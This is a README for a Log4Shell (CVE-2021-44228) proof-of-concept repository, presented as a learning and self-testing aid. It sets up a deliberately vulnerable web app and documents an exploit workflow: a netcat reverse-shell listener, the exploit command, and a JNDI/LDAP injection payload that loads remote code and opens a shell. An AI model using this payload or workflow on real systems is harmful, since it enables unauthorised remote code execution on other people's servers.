A Proof-Of-Concept vulnerable web application for the Log4J vulnerability (CVE-2021-44228), based off Kozmer's Log4Shell POC. This simple fork allows a web browser's User Agent to be logged when the site is visited.
Recently there was a new vulnerability in log4j, a java logging library that is very widely used in the likes of elasticsearch, minecraft and numerous others.
In this repository we have made and example vulnerable application and proof-of-concept (POC) exploit of it.
Vuln Web App:
webapp.mp4
Ghidra (Old script):
ghidra.mp4
Minecraft PoC (Old script):
mclol.mp4
As a PoC we have created a python file that automates the process.
pip install -r requirements.txt
- Start a netcat listener to accept reverse shell connection.
nc -lvnp 9001
- Launch the exploit.
Note: For this to work, the extracted java archive has to be named:jdk1.8.0_20
, and be in the same directory.
$ python3 poc.py --userip localhost --webport 8000 --lport 9001
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
[+] Exploit java class created success
[+] Setting up fake LDAP server
[+] Send me: ${jndi:ldap://localhost:1389/a}
Listening on 0.0.0.0:1389
This script will setup the HTTP server and the LDAP server for you, and it will also create the payload that you can use to paste into the vulnerable parameter. After this, if everything went well, you should get a shell on the lport.
We have added a Dockerfile with the vulnerable webapp. You can use this by following the steps below:
1: docker build -t log4j-shell-poc .
2: docker run --network host log4j-shell-poc
Once it is running, you can access it on localhost:8080
If you would like to further develop the project you can use Intellij IDE which we used to develop the project. We have also included a .idea
folder where we have configuration files which make the job a bit easier. You can probably also use other IDE's too.
At the time of creating the exploit we were unsure of exactly which versions of java work and which don't so chose to work with one of the earliest versions of java 8: java-8u20
.
Oracle thankfully provides an archive for all previous java versions:
https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html.
Scroll down to 8u20
and download the appropriate files for your operating system and hardware.
Note: You do need to make an account to be able to download the package.
Once you have downloaded and extracted the archive, you can find java
and a few related binaries in jdk1.8.0_20/bin
.
Note: Please make sure to extract the jdk folder into this repository with the same name in order for it to work.
❯ tar -xf jdk-8u20-linux-x64.tar.gz
❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)
This repository is not intended to be a one-click exploit to CVE-2021-44228. The purpose of this project is to help people learn about this awesome vulnerability, and perhaps test their own applications (however there are better applications for this purpose, ei: https://log4shell.tools/).
Our team will not aid, or endorse any use of this exploit for malicious activity, thus if you ask for help you may be required to provide us with proof that you either own the target service or you have permissions to pentest on it.